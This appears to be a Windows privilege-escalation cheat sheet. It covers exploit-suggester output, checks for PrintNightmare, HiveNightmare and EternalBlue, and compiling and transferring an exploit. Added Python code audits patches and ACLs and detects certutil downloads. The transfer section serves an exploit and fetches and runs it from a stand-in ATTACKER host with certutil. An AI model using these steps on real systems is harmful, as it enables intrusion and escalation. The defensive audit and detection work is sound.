KERNEL EXPLOITS
windows-exploit-suggester
Match OS/patches to exploits — run systeminfo on the target, then feed the saved output to wes.py on the attacker machine
systeminfo > sysinfo.txt
python3 wes.py sysinfo.txt
Example Output
python3 wes.py sysinfo.txt
[E] MS17-010: EternalBlue
Affected: Windows Server 2016
KB: KB4013389 (NOT installed)
[E] CVE-2021-1732: Win32k Elevation
Affected: Windows 10/Server 2019
[M] CVE-2020-0787: BITS Elevation
Affected: All Windows versions
(Cross-reference with installed hotfixes)
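The cross-reference wes.py performs can be reproduced for a patch audit. The Python below is an added example, not part of the original cheat sheet or of the wes.py project: it parses a constructed `systeminfo` dump for the OS fields and the installed hotfix list, then reports which advisories are still open. Only the MS17-010 to KB4013389 pairing comes from the page; the other two KB values are labelled placeholders, and the host name and KB0000xxx hotfixes in the sample are made up.

```python
import re

# Constructed sample of `systeminfo` output, trimmed to the fields used here.
# The host name and the KB0000xxx hotfix numbers are made up; KB4013389 is the
# MS17-010 patch the page's wes.py output refers to.
SAMPLE_SYSTEMINFO = """\
Host Name:                 LAB-HOST
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB0000001
                           [02]: KB4013389
                           [03]: KB0000002
Network Card(s):           1 NIC(s) Installed.
"""

# Advisory -> KB that closes it on this build. Only the MS17-010 pairing comes
# from the page; the other two are placeholders, since the correct KB depends
# on the exact build and must be taken from the vendor advisory.
REQUIRED_KBS = {
    "MS17-010 (EternalBlue)": "KB4013389",
    "CVE-2021-1732 (Win32k Elevation)": "KB<placeholder-for-CVE-2021-1732>",
    "CVE-2020-0787 (BITS Elevation)": "KB<placeholder-for-CVE-2020-0787>",
}

_FIELD_RE = re.compile(r"^(OS Name|OS Version|System Type):\s+(.*)$", re.M)
_KB_RE = re.compile(r"\[\d+\]:\s*(KB\d+)")


def parse_systeminfo(text):
    """Extract OS name/version, architecture and the installed hotfix set."""
    fields = {k: v.strip() for k, v in _FIELD_RE.findall(text)}
    return {
        "os_name": fields.get("OS Name", ""),
        "os_version": fields.get("OS Version", ""),
        "arch": "x64" if "x64" in fields.get("System Type", "") else "x86",
        "hotfixes": set(_KB_RE.findall(text)),
    }


def missing_patches(info, required=REQUIRED_KBS):
    """Advisories whose closing KB does not appear in the installed hotfixes."""
    return sorted(adv for adv, kb in required.items() if kb not in info["hotfixes"])


if __name__ == "__main__":
    info = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(f"{info['os_name']} ({info['arch']}), {len(info['hotfixes'])} hotfixes installed")
    for adv in missing_patches(info):
        print(f"[MISSING] {adv}: install {REQUIRED_KBS[adv]}")
```

The architecture field is kept because it decides which build of a patch (or, for the attacker, which build of an exploit) applies; a KB list alone does not tell you that. Superseding cumulative updates are not modelled here, so a missing KB may already be covered by a later rollup and needs checking against the advisory's supersedence data.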
Check for common CVEs
Quick manual check — Based on OS version
PrintNightmare (CVE-2021-34527)
HiveNightmare (CVE-2021-36934)
EternalBlue (MS17-010)
MS16-032 (Secondary Logon)
Example Output
PrintNightmare (CVE-2021-1675):
Get-Service Spooler -> Running = potentially vulnerable
HiveNightmare (CVE-2021-36934):
icacls C:\Windows\System32\config\SAM -> BUILTIN\Users:(I)(RX) = vulnerable!
EternalBlue (MS17-010):
nmap --script smb-vuln-ms17-010 -p 445 target
(Check each based on OS version)
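The two manual checks above can be scripted as a defender's audit. The Python below is an added example, not part of the original cheat sheet: it parses constructed `icacls` and `sc query spooler` output, applies the page's vulnerable conditions (BUILTIN\Users with a read-capable right on the SAM hive; Spooler running) and pairs each finding with the remediation to apply. Both sample outputs are constructed, and the parser only understands icacls simple-rights tokens such as (F), (M), (RX), (R).

```python
import re

# Constructed sample output of `icacls C:\Windows\System32\config\SAM` on a
# host where the SAM hive is world-readable (the condition the page flags).
SAMPLE_ICACLS_EXPOSED = r"""C:\Windows\System32\config\SAM BUILTIN\Administrators:(I)(F)
                               NT AUTHORITY\SYSTEM:(I)(F)
                               BUILTIN\Users:(I)(RX)
                               APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

# Constructed sample after the ACL has been corrected: no BUILTIN\Users entry.
SAMPLE_ICACLS_FIXED = r"""C:\Windows\System32\config\SAM BUILTIN\Administrators:(I)(F)
                               NT AUTHORITY\SYSTEM:(I)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# Constructed sample output of `sc query spooler`.
SAMPLE_SC_QUERY = """
SERVICE_NAME: spooler
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
"""

# icacls rights tokens that grant read access. Inheritance flags such as (I),
# (OI) and (CI) are not rights and are deliberately not in this set.
READ_RIGHTS = {"F", "M", "RX", "R", "GR", "RD"}

_USERS_ACE_RE = re.compile(r"BUILTIN\\Users:((?:\([A-Z,]+\))+)")
_TOKEN_RE = re.compile(r"\(([A-Z,]+)\)")
_STATE_RE = re.compile(r"STATE\s*:\s*\d+\s+(\w+)")


def users_can_read(icacls_output):
    """True if any BUILTIN\\Users entry carries a read-capable right."""
    for ace in _USERS_ACE_RE.finditer(icacls_output):
        tokens = {t for grp in _TOKEN_RE.findall(ace.group(1)) for t in grp.split(",")}
        if tokens & READ_RIGHTS:
            return True
    return False


def service_state(sc_output):
    """Return the STATE word (e.g. RUNNING, STOPPED) from `sc query` output."""
    m = _STATE_RE.search(sc_output)
    return m.group(1) if m else "UNKNOWN"


def audit(icacls_output, sc_output):
    """Collect findings, each paired with the remediation a defender would apply."""
    findings = []
    if users_can_read(icacls_output):
        findings.append(
            "HiveNightmare (CVE-2021-36934): BUILTIN\\Users can read the SAM hive. "
            "Fix: restore the ACL with `icacls %windir%\\system32\\config\\*.* /inheritance:e`, "
            "delete shadow copies that captured the hive, then apply the vendor patch."
        )
    if service_state(sc_output) == "RUNNING":
        findings.append(
            "PrintNightmare (CVE-2021-34527): Print Spooler is running. "
            "Fix: apply the vendor patch; where the host does not need to print, "
            "`Stop-Service Spooler; Set-Service Spooler -StartupType Disabled`."
        )
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_ICACLS_EXPOSED, SAMPLE_SC_QUERY):
        print(finding)
```

Restoring inheritance on the config directory only fixes the live files; shadow copies made while the ACL was wrong still hold a readable SAM, which is why the finding lists both steps.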
Compile and transfer exploit
Match architecture — x86 vs x64 matters
Cross-compile or use pre-compiled binaries from GitHub
Example Output
On attacker:
x86_64-w64-mingw32-gcc exploit.c -o exploit.exe
python3 -m http.server 80
On target:
certutil -urlcache -split -f http://ATTACKER/exploit.exe C:\temp\exploit.exe
C:\temp\exploit.exe
(Cross-compile Windows exploits on Linux)
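The certutil download step above is a well-known living-off-the-land pattern, and the defender's counterpart is to alert on it in process-creation telemetry. The Python below is an added example, not part of the original cheat sheet: it runs a detection for `certutil -urlcache ... -f <url>` over constructed process records and returns the fetched URL for each hit. The records, the "image | command line" layout and the 203.0.113.5 address (a documentation address standing in for ATTACKER) are all made up.

```python
import re

# Constructed process-creation records ("image | command line"); not real
# telemetry. 203.0.113.5 is a documentation address standing in for ATTACKER.
SAMPLE_PROC_LOG = [
    r"C:\Windows\System32\certutil.exe | certutil -urlcache -split -f http://203.0.113.5/exploit.exe C:\temp\exploit.exe",
    r"C:\Windows\System32\certutil.exe | certutil -hashfile C:\temp\installer.msi SHA256",
    r"C:\Windows\System32\cmd.exe | cmd /c C:\temp\exploit.exe",
    r"C:\Program Files\Git\bin\git.exe | git pull",
    r"C:\Windows\System32\certutil.exe | CertUtil.exe -URLCache -f https://203.0.113.5/a.txt a.txt",
]

# certutil invoked with -urlcache and -f followed by an http(s) URL: the
# download form used on this page. Case-insensitive, since Windows is.
_CERTUTIL_DL_RE = re.compile(
    r"certutil(?:\.exe)?\b.*?-urlcache\b.*?-f\b\s+(?P<url>https?://\S+)", re.I
)


def certutil_download_url(cmdline):
    """Return the URL fetched by a certutil download command, else None."""
    m = _CERTUTIL_DL_RE.search(cmdline)
    return m.group("url") if m else None


def flag_certutil_downloads(records):
    """Return (record index, URL) for every record that is a certutil download."""
    hits = []
    for i, rec in enumerate(records):
        url = certutil_download_url(rec)
        if url:
            hits.append((i, url))
    return hits


if __name__ == "__main__":
    for idx, url in flag_certutil_downloads(SAMPLE_PROC_LOG):
        print(f"[ALERT] certutil download in record {idx}: {url}")
```

The legitimate `-hashfile` use in the sample is left alone, which is the point of matching on the `-urlcache`/`-f`/URL combination rather than on the certutil image name. Blocking or alerting on certutil outbound connections at the proxy or host firewall covers the same step without relying on command-line parsing.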